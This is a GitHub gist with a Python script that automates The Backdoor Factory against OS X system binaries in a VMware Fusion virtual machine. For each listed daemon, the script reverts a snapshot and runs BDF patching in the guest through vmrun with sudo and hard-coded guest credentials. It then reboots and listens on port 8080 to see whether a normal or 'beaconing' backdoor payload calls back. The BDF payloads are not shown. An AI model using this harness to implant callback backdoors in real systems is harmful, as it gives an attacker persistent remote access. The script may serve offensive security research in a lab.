Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Script to automate the patching of binaries on OS X using vmfusion, python, vmrun, and BDF. Tail the log for additional output.
#!/user/bin/python
import os
import socket
import logging
import time
#edit the paths below with your username. this script was not build for public useage.
#given a list of paths
#path each of these then launch a port to listen for a connection
listofbins = ['/System/Library/PrivateFrameworks/CacheDelete.framework/deleted',
]
logging.basicConfig(filename='patching.log',
level='INFO',
format='%(asctime)s %(message)s'
)
revert_cmd = 'vmrun -T fusion revertToSnapshot /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx "for testing core daemons"'
start_cmd = 'vmrun -T fusion start /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx'
restart_cmd = 'vmrun -T fusion reset /Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx'
def socket_test(atimeout):
print "Listening for", atimeout, "seconds"
successful_connection = False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.settimeout(atimeout)
try:
s.bind(('0.0.0.0', 8080))
s.listen(1)
conn, addr = s.accept()
logging.debug('Connected by %s' % str(addr))
print 'Connected by', addr
successful_connection = True
except Exception as e:
print str(e)
try:
logging.debug('Attempting to close socket')
print 'Attempting to close socket'
conn.close()
s.shutdown()
s.close()
time.sleep(5)
except:
pass
return successful_connection
with open('patching_log', 'w') as f:
for binary in listofbins:
os.system(revert_cmd)
os.system(start_cmd)
successful_connection = False
normal_patching_script = '''vmrun -T fusion -gu test -gp password runScriptInGuest "/Users/YOURUSERNAME/Documents/Virtual Machines.localized/OS X 10.10.vmwarevm/OS X 10.10.vmx" -activeWindow -interactive "/bin/bash" "sudo bash -c '/Users/test/the-backdoor-factory/automate_testing.py '"''' + str(binary)
beaconing_patching_script = '''vmrun -T fusion -gu test -gp password runScriptInGuest "/Users/YOURUSERNAME/Documents/Virtual Machines.localized/OS X 10.10.vmwarevm/OS X 10.10.vmx" -activeWindow -interactive "/bin/bash" "sudo bash -c '/Users/test/the-backdoor-factory/beaconing_automate_testing.py '"''' + str(binary)
logging.debug('Attmepting normal patching of %s' % binary)
print "Normal patching", binary
time.sleep(5)
os.system(normal_patching_script)
os.system(restart_cmd)
successful_connection = socket_test(60)
if successful_connection is True:
logging.info('Successful patching with normal payload of %s' % binary)
writeThis = 'Successful patching with normal payload of %s\n' % binary
f.write(writeThis)
continue
else:
logging.info('No patching with regular payload for %s' % binary)
writeThis = 'No patching with regular payload for %s\n' % binary
f.write(writeThis)
time.sleep(5)
logging.debug("Beaconing patching of %s" % binary)
print "Beaconing patching", binary
os.system(revert_cmd)
os.system(start_cmd)
os.system(beaconing_patching_script)
os.system(restart_cmd)
successful_connection = socket_test(60)
if successful_connection is True:
logging.info("Successful patching with beaconing payload of %s" % binary)
writeThis = 'Successful patching with beaconing payload of %s\n' % binary
f.write(writeThis)
continue
else:
logging.info("No patching with beaconing payload for %s" % binary)
writeThis = 'No patching with beaconing payload for %s\n' % binary
f.write(writeThis)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment